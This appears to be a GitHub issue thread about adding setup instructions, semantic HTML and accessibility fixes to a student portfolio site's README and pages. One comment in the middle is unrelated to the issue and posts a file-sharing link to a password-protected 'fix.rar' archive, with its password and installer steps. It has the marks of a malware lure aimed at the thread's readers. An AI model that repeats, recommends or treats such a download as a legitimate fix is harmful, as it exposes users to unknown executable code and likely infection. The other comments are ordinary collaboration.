### ISSUE TITLE
add details to portfolio website README and improve accessibility

### ISSUE THREAD

**Issue by stmcpeters** [stmcpeters/Techtonica-Assignments#11]
- README.md is missing clear set up instructions (how to fork/clone project).
- more semantic HTML tags such as details, header, main, section, or summary
- improve accessibility: only one "alt" property for image so far

**Comment by dirk-seynhaeve** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChasVanDav** [comment]
I can help with this issue! Feel free to add me as a contributor. :)

**Comment by stmcpeters** [comment]
> I can help with this issue! Feel free to add me as a contributor. :)

done! :)
